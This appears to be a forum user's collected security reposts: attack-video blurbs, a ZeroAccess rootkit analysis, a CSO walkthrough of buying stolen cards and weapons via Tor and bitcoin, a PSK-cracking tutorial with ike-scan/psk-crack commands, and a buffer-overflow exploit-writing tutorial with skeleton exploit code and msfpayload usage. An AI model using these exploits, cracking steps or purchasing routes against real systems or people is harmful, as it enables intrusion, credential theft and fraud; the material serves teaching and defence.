Nytro

Everything posted by Nytro

  1. Athcon 2011 Exploiting Anti-Reversing Techniques
     Description: AthCon IT Security Conference. Title: Exploiting Anti-Reversing Techniques: Attacking Armadillo's Loader under Xenocode Application Virtualization. Speaker: Kyriakos Economou.
     Source: Athcon 2011 Exploiting Anti-Reversing Techniques
  2. Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec
     Description: Athcon IT Security Conference. Title: Win32 Exploit Development with pvefindaddr + Project Quebec. Speaker: Peter Van Eeckhoutte.
     Source: Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec
  3. Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"
     Description: "Attacking VoIP and understanding what cyber-crime is doing"
     Source: Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"
  4. Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"
     Description: "The DHCP Recession: Extended DHCP Exhausting attack"
     Source: Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"
  5. Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices
     Description: Mobile privacy: Tor on the iPhone and other unusual devices
     Source: Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices
  6. Microsoft Windows Eot Font Table Directory Integer Overflow.
     Description: This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer.
     Source: Microsoft Windows Eot Font Table Directory Integer Overflow.
  7. Intersect Framework :: Install Persistent Backdoors
     Description: This video demonstrates how to use the Intersect 'persistent' module to install or remove a persistent backdoor. This backdoor can be used with any of the Intersect shell modules, will survive reboots and can only be removed by using your custom Intersect script (not even root users can modify or delete the backdoor files). Intersect homepage: http://github.com/ohdae/Intersect-2.5/
     Source: Intersect Framework :: Install Persistent Backdoors
  8. Social Engineer-Toolkit And Windows Credentials Editor
     Description: Using SET & WCE to pull passwords off a fully patched Windows 7 box running MSE. @fjhackett
     Source: Social Engineer-Toolkit And Windows Credentials Editor
  9. Spoofing Dns With Nmap Fast Track Script
     http://www.youtube.com/watch?v=uAfk-_j-EUM&feature=player_embedded
     Description: spoofing DNS - spoof all websites; nmap fast track script: www.4shared.com/rar/4n4nYdcO/nmapf.html
     Source: Spoofing Dns With Nmap Fast Track Script
  10. Dos Attack On Win8 With Hping3 (Packet Flooding)
     Description: DOS Attack on Win8 with Hping3 (Packet Flooding)
     Source: Dos Attack On Win8 With Hping3 (Packet Flooding)
  11. Arbitrary File Upload And Bypassing Protections(Dvwa)
     Description: In this demo, we bypass upload protections to upload an arbitrary file, and demonstrate how the file upload protection techniques used in DVWA can be bypassed.
     Source: Arbitrary File Upload And Bypassing Protections(Dvwa)
  12. Dns Spoofing Plus Wpad Equals Compromised
     Description: [[Web found, this is not my video but wanted to share it with securitytube]] How hard is it for someone to insert a proxy between you and the rest of the Internet without you knowing? Will running a Mac or Linux protect you? In this episode we combine the concepts from Episode 20 with the WPAD style attack that was discussed back in Episode 17, creating a quick and easy how-to when it comes to creating a man in the middle attack that will work against any system that has Automatic Proxy Discovery enabled. This feature is sometimes thought to be a Windows specific issue, but as we demonstrate here by transparently creating a man in the middle proxy for a Mac, it really does apply everywhere. There are just a few simple pieces that you need to accomplish this attack and there are some quick and easy things that you can do to defend yourself or that you can look for during an audit. For more details and a link to the source code, please check the Blog article here: IT Security Audit: What About WPAD?/
     Source: Dns Spoofing Plus Wpad Equals Compromised
  13. Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks!
     Description: [[Web found, I did not make this video but wanted to share it with securitytube]] WPAD is a terrific protocol for ease of configuration, but it's also a phenomenal protocol for hackers and penetration testers. This short video will describe the issue, demonstrate how it's exploited and give you quick and easy suggestions that you can use to protect your business network or protect yourself personally when you're using your web browser in Starbucks or McDonald's! For more demonstrations, tips and tricks, visit Auditcasts. For an in-depth discussion of this issue and how to solve it, visit http://audit.sans.org/blog
     Source: Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks!
  14. Exploit Pack - Web Security 2.2
     http://www.youtube.com/watch?v=jCR5TSTmtJE&feature=player_embedded
     Description: Exploit Pack - Web Security. Take control of remote browsers, steal social network credentials, obtain persistence on remote browsers, distributed denial of service and more. Follow me on twitter: @exploitpack Skype me: juansacco
     Source: Exploit Pack - Web Security 2.2
  15. Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)
     Description: This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild in April 2012. This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which is loaded after Office has loaded, so the malicious file must be loaded through "File / Open" to achieve exploitation.
     Source: Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)
  16. Targeting ZeroAccess Rootkit's Achilles' Heel
     Monday, April 30, 2012 at 4:17pm by Aditya Kapoor

     Proliferation

     ZeroAccess is one of the most talked and blogged [1], [2] about rootkits in recent times. It is also one of the most complex and highly prevalent rootkits we have encountered, and it is still continuing to evolve. The ZeroAccess rootkit is distributed via both social engineering and exploitation. A recent blog post by our colleagues at McAfee describes some of the odd methods this rootkit adopts to get installed on machines without getting noticed. One of the goals of this rootkit is to create a powerful peer-to-peer botnet, which is capable of downloading additional malware onto the infected system. This botnet is reportedly [3] involved in click fraud, downloading rogue antivirus applications, and generating spam.

     This Google map of the United States shows McAfee VirusScan consumer nodes reporting unique ZeroAccess detections over the past week. Our consumer data for the past month shows close to 4,000 unique systems detecting ZeroAccess daily, and the trend is continuing upward.

     Installation

     In my recent analysis of this rootkit, I was looking to understand the initial installation mechanism. The installation of ZeroAccess involves overwriting a legitimate driver on disk with the malicious rootkit driver. Usually Step 1 varies between variants, i.e. some variants directly overwrite a legitimate driver, and others first inject the malicious code into trusted processes like explorer.exe and then, from the injected code, overwrite the driver (this is done to bypass various security products and to make analysis more challenging). During Step 1, the original driver code is kept in memory. The driver which is overwritten in Step 2 is randomly selected (details here [1]); in the discussion below we assume CDROM.sys is being overwritten. Step 2 to Step 8 are fairly static across variants of ZeroAccess.

     Once the driver is overwritten by malicious code, it is loaded in kernel space. The first task of the kernel mode code is to ensure that it sets up the malware to survive reboots and to forge the view of the overwritten driver (CDROM.sys). Let's move on to see how this scheme works in Step 5 to Step 8. In Step 5, ZeroAccess intercepts disk I/O by hooking the DeviceExtension->LowerDeviceObject field in the \driver\disk DEVICE_OBJECT. So now any disk I/O would go through the rootkit's malicious routine. In Step 6, the kernel mode code has access to the clean image of the CDROM.sys driver stored in memory, and to survive reboots it flushes the file to disk using the ZwFlushVirtualMemory API. The request to flush the clean image is interestingly sent to the file CDROM.sys, which at first glance looks counterintuitive. Why would the rootkit want to write the clean image to the file it just infected in Step 2? Looking more closely, the rootkit actually uses its disk I/O redirection framework. So, when this request to store the clean image of the file on disk traverses the virtual driver stack shown in Step 7, it is encrypted and redirected (Step 8) to the rootkit's "protected" folder that it created in Step 3, instead of going to the actual CDROM.sys. Once the original encrypted image of CDROM.sys is stored in the protected folder, the infection becomes persistent and can easily survive reboots. Any attempt to read the infected CDROM.sys would have to traverse the hijacked I/O path, where the rootkit decrypts the original file from its protected storage on the fly and presents the clean image, thus forging the view of the file to security tools. Also, during reboot the infected file would first load the malicious code in the kernel, which can refer to its "protected" folder and load the original file in the kernel, thus ensuring uninterrupted functionality of the original device.

     In order to clean this threat, security tools have to take several steps, either repairing memory or decrypting the files in its protected folder so that they can restore the original file. Also, once the rootkit is active in kernel mode it takes a lot of evasive steps to kill or circumvent the security tools, as described by our colleagues in this Virus Bulletin article. So repair becomes even more challenging and research costly.

     Impact of real time kernel monitoring

     I tested many variants of this rootkit family spanning over a year against McAfee's Deep Defender technology, which provides real time protection against unauthorized kernel memory modifications. The following screenshot shows Deep Defender blocking the DeviceExtension hijack attempt in Step 5, which was critical to the rootkit's survival. Once this hook was blocked, the machine was cleaned after a reboot without any fancy repairs, and it actually shaved off days of reverse engineering and writing custom repairs against this rootkit and its multiple variants. It seems as if Deep Defender hit right in the Achilles' heel of the rootkit.

     Is that it? How did Deep Defender clean the machine?

     No, you did not miss part of the article; the interesting part is that Deep Defender did not have to do any custom repairs to clean this threat. It just blocked the core functionality of the rootkit in real time. Let's revisit the attack strategy to understand what happened. When the rootkit attempted to hijack the DeviceExtension pointer in Step 5, Deep Defender's real time kernel memory protection saw the attempted change, recognized it as a malicious attempt to modify a critical structure, and blocked the hijack attempt. With the hook gone, the rootkit could not hijack the disk I/O path, which means it cannot store any files in its "protected" folder anymore and could not survive any reboots without getting noticed. It certainly cannot forge the view of the file anymore either.

     But the most interesting part is that the hijack block by Deep Defender actually redirected the rootkit's write attempt in Step 7 to its original location. So Step 8 would actually overwrite the original file that it had just infected from user mode, thus forcing the rootkit to clean up for us. After a reboot the system will be back in a clean state. This strategy from Deep Defender works against all the current ZeroAccess variants. It would be challenging for the rootkit authors to fully bypass this defense without either leaving the system in a corrupted state or being noticed by the security tools, which would catch them red handed if they cannot forge the view of the file anymore.
     Source: Targeting ZeroAccess Rootkit's Achilles' Heel | Blog Central
  17. Subterfuge - Man-in-the-Middle Attack Framework Tutorial
     By Irfan Shakeel

     Subterfuge is a framework that takes the arcane art of the Man-in-the-Middle Attack and makes it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a "push-button" security validation tool.

     The video below shows you how to configure Subterfuge on your computer. The operating system shown in the video is BackTrack 5, but you can install Subterfuge on other Linux distributions because Subterfuge installs its dependencies by itself. So this is a small video in the Subterfuge tutorial; I will show you how to perform the various attacks. Do not forget to comment about this wonderful tool and do not forget to share your experiences regarding the framework.
     Source: Subterfuge - Man-in-the-Middle Attack Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  18. How online black markets work
     Corporate investigator Brandon Gregg looks at how bitcoins and Tor make ********* black markets tick
     By Brandon Gregg, CPP
     April 30, 2012 — CSO — The internet is no stranger to crime. From counterfeit and stolen products, to illegal drugs, stolen identities and weapons, nearly anything can be purchased online with a few clicks of the mouse. The online black market not only can be accessed by anyone with an Internet connection, but the whole process of ordering illicit goods and services is alarmingly easy and *********, with multiple marketplaces to buy or sell anything you want. Understanding how the market thrives—unregulated and untraceable—can give you a better sense of the threats (or resources) that affect you and your business.

     In our scenario we are going to legally transfer $1,000 USD out of a regular bank account and into a mathematical system of binary codes, and then enter a neighborhood of the Internet largely used by criminals. This hidden world lets anyone purchase bulk downloads of stolen credit cards, as well as a credit card writer, blank cards, some "on stage" fake identities—and maybe even a grenade launcher they've had their eyes on. A journey into the darker side of the Internet starts with two open-source programs: Bitcoin and the Tor Bundle.

     Moving Money

     Bitcoin (Bitcoin - P2P digital currency) is a system tool that will act as a personal bank for storing and investing digital currency on your computer. Once it's installed on your system, it sits empty like a piggy bank, waiting to be filled with untraceable digital cash. Getting it filled is the tricky part. The digital monetary system online is predominately operated by the likes of Paypal, Western Union, and banking companies that try to follow government regulations to prevent fraud and money laundering.

     There are two steps to legally take money and have it converted at the current Bitcoin rate into BTCs in our digital and ********* bank. Start by opening a Dwolla (www.dwolla.com) banking account with no fees. You can use your real information—you aren't doing anything illegal. In about three days you will be given a fraud test and have to identify small transfers in your Dwolla and personal bank account. Once your account is confirmed, wire any amount from your personal bank to Dwolla, from a lump sum or the estimated price of the purchase you have in mind. After you confirm the transfers, your legit money will now be stored in a new global bank with less restriction than US banks. Next you need to set up an account with the largest bitcoin exchanger, MtGox. Due to fraud concerns, MtGox will only allow transfers from banks like Dwolla. After your Dwolla transfer moves to MtGox, you can use the money to purchase Bitcoins on the open market for a small percentage-based fee. Once this sale is complete, your bitcoins are best stored in your own bank account that is residing digitally on your computer. The whole process can be completed in less than a week, and the $1,000 USD is now exchanged to $191 BTC. Now you are ready to go shopping on the black market.

     Finding Markets

     The conversion of dollars to Bitcoins was legal and relatively safe. Actually engaging in black market shopping, though, connects you to various kinds of illegal activities. We'll continue our walkthrough but we are NOT endorsing these activities. This information can help security professionals understand how stolen identities and credit cards are used, how products are fenced or distributed illegally, and more. Clearly anyone engaging in black market activity wants to remain *********. So the next step in black market shopping is to download and open the Tor Bundle Pack (https://www.torproject.org/).

     We have touched on Tor two or three times to protect your identity while online, but Tor includes other functions. Developed by the US Navy for secret communications and now used to circumvent blocked websites at offices across the country and to inspire Arab Springs, Tor has a darker cousin: Hidden Tor Servers. The same random spider-web routing of Internet traffic that hides an end user's IP and location from any prying eyes can hide server locations too. Hidden Tor Servers are now the norm for storing, accessing and hiding illicit activity such as child pornography. The level of protection provided by Tor makes law enforcement's job of tracking such activities next to impossible. (Interestingly, the hacktivist group ********* has recently brought attention to such evil servers by controlling them as DDoS servers against some of their targets, including law enforcement and government groups. If the CIA is struck with a DDoS attack, the agency suffers but also, in investigating the source of the attack, discovers the child pornography and hopefully cracks the pornography ring.) Hidden Tor Servers are likewise home to much black market activity.

     Where does one find "the black market"? What does it look like? Of course, Google search answers these questions easily. Using your Tor browser (which, yes, is much slower than a standard browser) search for "Tor Directories". These websites offer a collection of Tor's hidden web pages for all kinds of storefronts. Here you will find websites similar to Yahoo's early days, categorizing storefronts including Drugs, Weapons and other illegal goods and activities. If the directory (or store) is listed with a standard .com or .org domain, it will open in your standard browser; if it ends in .onion then it means it's a hidden server only viewable in the Tor browser.

     One example is the Nobody@Zerodays website (nobody.zerodays.org/hidden-directory/), which offers reviews and direct links to current Hidden Tor sites. In our scenario we are going to check out the Black Market Reloaded and look for the current price of some credit cards and tools. Using Tor you can quickly jump to the Black Market Reloaded website, register (no real information needed), and start shopping. As on Amazon, sellers show off their products with details, pictures and pricing, including feedback collected from past buyers. On a given day in April, current pricing for bulk credit cards is running at $6.5 BTC with great seller feedback. One seller advertises: "All of our Products are coming with full given Information. That means: All needed information like cardnumber, security code, expiration date, name, address, city, state, zipcode, country, phone, SSN, DOB, security question etc. is given. Also Track 1+2 data and PIN. All CCs are checked and have a minimum Balance of 1000€/$, and most of them are from an EU-Country. We also have US-Cards, but it's easier to cashout the money at ATMs (/buy virtual money online/link the CC to PayPal) with european ones." A "Credit card reader/writer, HiCo/LoCo, all ISO complete" is going for 76.60350 BTC (or $366.63 USD at the time of our exchange) and there are also a handful of unregistered handguns, including a brand new M9 Tactical handgun with an illegal silencer, unregistered of course, for 225.00000 BTC or $1,076.87 USD. Anyone who executes these purchases via ********* bitcoins will leave no trace of the transaction. All users can send data via Hidden Tor email servers, or ship physical items like drugs and weapons with the US Postal Service to prevent any searches without a warrant. When shipments come from within the US, the illegal goods are likely to arrive at the right mailbox without incident.

     For those who want an added layer of protection—say in the event that goods are being shipped from outside the US—many people in the "Services" section of this site will buy and/or receive items on your behalf using their own bitcoins and addresses, and then remail the goods to you, for a small fee. (Also, some users of these sites will offer to sell you bitcoins via Paypal so you can skip the two banking steps above and jump right into buying your goods; there is of course no guarantee that you will receive your bitcoins after giving up your cash.)

     Tor's Hidden Servers provide real insight into an underground world that once was limited to dark alleys, shady places, and dangerous criminals. Much like the Internet has expanded our e-commerce into a borderless global market, bitcoins and Tor have made shopping for illicit goods and services almost as easy as ordering an iTunes song on your computer. As a reminder, most of the purchases described here are illegal and/or dangerous. While it's extremely difficult to identify the individuals involved without additional intel, law enforcement personnel and corporate investigators can use these processes to keep tabs on the flow of stolen, counterfeit, or diverted goods. If these transactions are being executed on your corporate network, that activity can expose your organization to legal and other risks. While network logs will not show the Tor websites, software audits for programs like Tor, network sniffing of actual traffic, computer monitoring and computer forensics can show employers who is using Tor sites and what they are doing.

     Brandon Gregg is a corporate investigations manager.
     Source: How online black markets work - CSO Online - Security and Risk
  19. Zuckerberg's employees get rich right from the day they are hired. How much a student with no experience earns at Facebook
     Facebook founder Mark Zuckerberg rewards his interns royally. Moreover, those who land an internship at the entrepreneur's company confess that in a year they manage to save enough money to afford various extravagances afterwards.
     28 April 2012 06:00 | 659 views | author: incont.ro

     The average salary for an intern working on software development at Facebook is over $5,000 per month, according to Business Insider. If we do not take into account the taxes that interns pay to the American state, their pay reaches $60,000 per year, quite a lot of money for someone with little programming experience. Moreover, there are even luckier interns. According to sources cited by Business Insider, some undergraduate or master's students interning at the social network earn as much as $6,800 per month, to which is added a stipend for personal expenses worth $1,000. The average salary for an engineer working on programming at Facebook is $6,229, GlassDoor.com also writes. Facebook wants to raise approximately $5 billion through its stock market listing, preparing the largest initial public offering ever carried out in the IT industry, which could give it a capitalization of up to $100 billion. Analysts believe that investors will fight over Facebook shares in the initial public offering, but negative signals about slowing growth could lead some not to become long-term shareholders. Facebook, founded in 2004 by Mark Zuckerberg, exceeded the threshold of 900 million monthly active users for the first time in the first quarter.

     The company hired 1,100 people in the last 12 months, bringing the total number of employees to 3,539, according to reports filed Monday evening with the US Securities and Exchange Commission. Expenses doubled in the last 12 months, while revenues rose by only 45%, the company said. Net profit thus fell by 12% in the first quarter, to $205 million, from $233 million in the corresponding period of last year. Revenues totaled $1.06 billion, down 6% from the fourth quarter. Besides slowing growth, Facebook also has problems related to intellectual property rights and patents. Yahoo sued Facebook for infringing patents, while the social network is trying to strengthen its intellectual property portfolio to avoid future court battles. Facebook announced on Monday that it will pay $550 million to Microsoft for a portfolio of several hundred patents.
     Source: Zuckerberg's employees get rich right from the day they are hired. How much a student with no experience earns at Facebook - www.InCont.ro
  20. Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
     Kislay Bhardwaj - 1:50 AM

     In IKE Aggressive Mode the authentication hash based on a pre-shared key (PSK) is transmitted as the response to the initial packet of a VPN client that wants to establish an IPsec tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump, and start a dictionary or brute force attack against this hash to recover the PSK. This attack only works in IKE Aggressive Mode because in IKE Main Mode the hash is already encrypted. Based on such facts, IKE Aggressive Mode is not very secure. It looks like this:

         $ sudo ike-scan 192.168.207.134
         Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
         192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
         Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 0 returned handshake; 1 returned notify

         $ sudo ike-scan -A 192.168.207.134
         Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)
         192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX (Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)

     To save with some output:

         $ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key

     Once you have your PSK file to crack you're stuck with two options, psk-crack and Cain. psk-crack is fairly rudimentary to brute force:

         $ psk-crack -b 5 192-168-207-134key
         Running in brute-force cracking mode
         Brute force with 36 chars up to length 5 will take up to 60466176 iterations
         no match found for MD5 hash 5c178d[SNIP]
         Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

     The default charset is "0123456789abcdefghijklmnopqrstuvwxyz" and can be changed with --charset=

         $ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
         Running in brute-force cracking mode
         Brute force with 63 chars up to length 5 will take up to 992436543 iterations

     To dictionary attack:

         $ psk-crack -d /path/to/dictionary 192-168-207-134key
         Running in dictionary cracking mode
         no match found for MD5 hash 5c178d[SNIP]
         Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)

     You may find yourself wanting a bit more flexibility or options during brute forcing or dictionary attacking (i.e. character substitution). For this you'll need to use Cain. The problem I ran into was that Cain is a Windows tool and ike-scan is *nix. I couldn't get the Windows tool that is floating around to work. Solution... run in VMware and have Cain sniff on your VMware interface. The PSK should show up in the passwords of the sniffer tab, then you can select and "send to cracker". It's slow as hell, but more options than psk-crack.
     Source: Kislay Bhardwaj: Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
  21. Exploit writing: A basic Idea.
     Kislay Bhardwaj - 1:59 PM

     Exploit Writing Made Easier With !pvefindaddr

     A few notes before we begin, covering what this paper is about and what it isn't about:
     1. This paper is intended to demonstrate the efficiency of !pvefindaddr.
     2. This paper will not explain the exploit till the end; if you want the full exploit go here: http:// AOL Desktop 9.6 .rtx Buffer Overflow

     Now let's start!

     Required software: Immunity Debugger, !pvefindaddr, AOL Desktop v9.6
     Required knowledge: Understanding how buffer overflows work. Exploiting techniques. A programming language (I use Python).

     I've heard a lot of people complaining about how many apps they must use when writing exploits, or how time consuming some tasks can be if they are not automated, or when trying to test multiple DLLs for SAFESEH or ASLR; that's where !pvefindaddr comes in. What is !pvefindaddr? Well, in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need when building an exploit. Here is some helpful information on how to install !pvefindaddr and some basic usage.

     Ok, let us get started! Install AOL Desktop v9.6 (a quick note here: if the app doesn't work properly in Immunity Debugger you will have to close the debugger, issue CTRL+ALT+DELETE -> Processes and stop all AOL related processes, then run the app).

     Now let's make the exploit skeleton (I won't remake the full exploit; if you want to check it out, it's at the top of the page). It will contain two standard headers and between them our buffer. Let's check it out:

     ****************************************
     #!/usr/bin/python3
     # Exploit skeleton: two fixed headers with the attacker-controlled buffer between them.

     # The First Header
     hd1 = (b"\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"
            b"\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41"
            b"\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"
            b"\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41"
            b"\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22"
            b"\x68\x74\x74\x70\x3a\x2f\x2f")

     # The Second Header
     hd2 = (b"\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52"
            b"\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f"
            b"\x48\x54\x4d\x4c\x3e\x0d\x0a")

     # 6000 NOP bytes, enough to overwrite EIP; the cyclic pattern replaces this later.
     payload = b"\x90" * 6000
     exploit = hd1 + payload + hd2

     try:
         # Binary mode so the bytes are written unchanged.
         with open("exploit.rtx", "wb") as f:
             f.write(exploit)
         print("File created, time to PEW PEW!\n")
     except OSError:
         print("Something went wrong!\n")
         print("Check if you have permissions to write in that folder, or if the folder exists!")
     ****************************************

     Generate the file using the exploit and after that open it in AOL Desktop, and as we can see we could overwrite EIP with our '\x90's: So what would be next? Calculating the exact offset until EIP overwrite. (NOTE: Before we go on, restart AOL and attach it again.) In our debugger we can either click on the PyCommands button, select !pvefindaddr from the list and then enter the arguments, or we can do this directly by entering !pvefindaddr and the arguments in the command bar at the bottom of the debugger, like this: As you can see it said "check mspattern.txt", so we go into the Immunity Debugger folder and open up mspattern.txt, copy the pattern into our exploit and regenerate the malicious file.

     After opening the malicious file containing our pattern: We can see that our EIP is 35784734 and we can also see that ESI points into our buffer. Now, in order to determine the exact offset, we will use another feature from !pvefindaddr. Normally with Metasploit we would try pattern_offset EIP now; well, with !pvefindaddr we can actually get more info, so let's try the findmsp function. After it is done just open the Log window and, as we can see, we have some nice information: So it found the first characters from the pattern in davclnt.dll, then it checked register addresses; we have the EIP overwrite address beginning at 5384 and the register which points into the pattern with the instruction CALL DWORD[ESI+10] (if you check) at 5368; it even checked the SEH chains to see if it finds the pattern there, and we also have the "Walking stack" which, if you haven't guessed by now, actually tells us when ESP contains a pointer to our buffer, at position 4360. This is a nice feature, but we have one that does even better: !pvefindaddr also has a function that runs a findmsp and after that, based on the results and on the stack, it actually gives us information about the type of exploit and how it should be made. Let's check it out: !pvefindaddr suggest Sweet, huh? Now we have the exact offset before the EIP overwrite and we know that ESI points to our buffer; the next normal step would be to get the value of ESI into EIP with a JMP ESI, CALL ESI, etc. Now these are simple instructions, we can find them, but what if we want to find these instructions without null bytes, from specific modules, etc.? (NOTE: I'm not saying this can't be done manually, only saying that it will take more time and this way it's much easier.)

     Let's say we want to make this exploit using a universal address (like the original exploit). Searching for this instruction can take a lot of time, mostly because it's a very common instruction, but using !pvefindaddr we can actually search for every JMP ESI instruction from some specific modules with some specific characteristics. We will use !pvefindaddr to give us a list of all modules and their characteristics; once we have done this we can view all the modules that the app uses and see which have SAFESEH, ASLR, etc.: Once we can see which modules we can use, we can start searching for the specific instruction using the command: !pvefindaddr j -r ESI -n -o (this might take some time, go get a beer or something). This function searches for pointers that jump to a specific register (ESI in our case); the most common use of this function is when dealing with a direct EIP overwrite. The function will look for any instructions like JMP ESI, CALL ESI combinations from non-fixup and non-ASLR modules; also the -n flag will not show pointers that contain null bytes and the -o flag will exclude the pointers in the OS modules (we want to make it universal). After a little search we find a nice instruction at 20C5CFC0 from aolusershell.dll; this one should work perfectly.
After we are done we can also use compare to check in order to compare some bytes (usually our shellcode) from a file with some bytes in memory it also compares unicode expanded instances, ok now we need to make our shellcode binary (only the shellcode), we can just give the RAW output at Metasploit when making a payload and pipe it to a file like: msfpayload windows/exec CMD=calc.exe R > shellcode There is also a nice perl script that shows you how to do it on the !pvefindaddr wiki: **************************************** my $shellcode="\xcc\xcc\xcc\xcc"; #paste your shellcode here open(FILE,">c:\\temp\\shellcode.bin"); binmode FILE; print FILE $shellcode; close(FILE); **************************************** We then run the whole exploit (with the shellcode included, without any breakpoints or anything), now that the app has crashed we compare it: !pve finder compare C:\shellcode After it is finished we can either view the Log Windows or open compare.txt from the Immunity Debugger folder: Now a quick review on what we managed to do in this tutorial: - We have determined the exact offset before EIP gets overwritten and also a register that points to our buffer. - We have found our type of exploit, and some information on how to structure it - Found out which modules have SAFESEH, ASLR or get rebased - Found the instruction we needed avoiding these modules and the OS modules aswell - Checked if our shellcode contains bad characters. So as you can see we did all the above with just !pvefindaddr and we also managed to save a good amount of time. Sursa: Kislay Bhardwaj: Exploit writing: A basic Idea.
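An added example, not code from the post or from the !pvefindaddr project, of what findmsp (or Metasploit's pattern_offset) computes behind the scenes when it maps the EIP value 35784734 quoted above back to offset 5384: it generates the cyclic pattern that mspattern.txt is assumed to contain (the Metasploit Aa0Aa1... scheme), accounts for the little-endian byte order of a register shown in the debugger, and reports None when the register does not hold pattern bytes at all. The 6000-byte buffer length comes from the post; every other value is constructed.

```python
"""Re-creating findmsp / pattern_offset for a direct EIP overwrite (crash triage).

Added example, not code from the post above or from !pvefindaddr.
The pattern is assumed to follow the Metasploit Aa0Aa1Aa2... scheme; the EIP
value 0x35784734 and the 6000-byte buffer are from the post, the rest is
constructed here.
"""
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
# 26 * 26 * 10 triplets of 3 chars: the pattern is unique up to this length
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280


def pattern_create(length):
    """Return a non-repeating pattern of `length` chars (Aa0Aa1...Zz9)."""
    if not 0 <= length <= MAX_LEN:
        raise ValueError("pattern length must be between 0 and %d" % MAX_LEN)
    full = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    return full[:length]


def pattern_offset(value, length=6000):
    """Offset of a crash value inside the pattern, or None if it is not there.

    `value` is either the 4 characters read from memory (a str) or the
    register value as the debugger prints it (an int).  A register holds a
    DWORD in little-endian order, so EIP = 0x35784734 means the bytes
    34 47 78 35 ('4Gx5') were taken from the buffer.
    """
    if isinstance(value, int):
        try:
            needle = value.to_bytes(4, "little").decode("ascii")
        except (OverflowError, UnicodeDecodeError):
            return None  # not four pattern bytes, e.g. 0x90909090 from the NOPs
    else:
        needle = value
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    print(pattern_offset(0x35784734))  # 5384, the offset findmsp reported
    print(pattern_offset(0x90909090))  # None: EIP did not hold pattern bytes
```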
  22. Computer Science at University:

Year I, semester I:
- Procedural programming (the C language)
- Mathematical logic (Boolean bullshit, rubbish)
- Algebra (crap)
- Analysis (even bigger crap)
- Algorithms and data structures (sorting, trees, useful)
- Computer architecture (what a processor looks like, interesting, ASM lab, useful)

Year I, semester II:
- Object-oriented programming (C++, important)
- Analysis II (crap)
- Algebra II (crap)
- Graph algorithms (too theoretical, lame)
- Geometry (crap as well)
- Formal languages and automata (not really sure what it's about)

Year II, semester I:
- web techniques: HTML, CSS and Javascript (practical)
- computational geometry (somewhat theoretical, I think)
- computability and complexity (optimizations, useful)
- advanced programming techniques (Java, very useful)
- operating systems (Linux, C++ under Linux, really cool)
- probability (not sure exactly, I think it's math, so lame)

Year II, semester II:
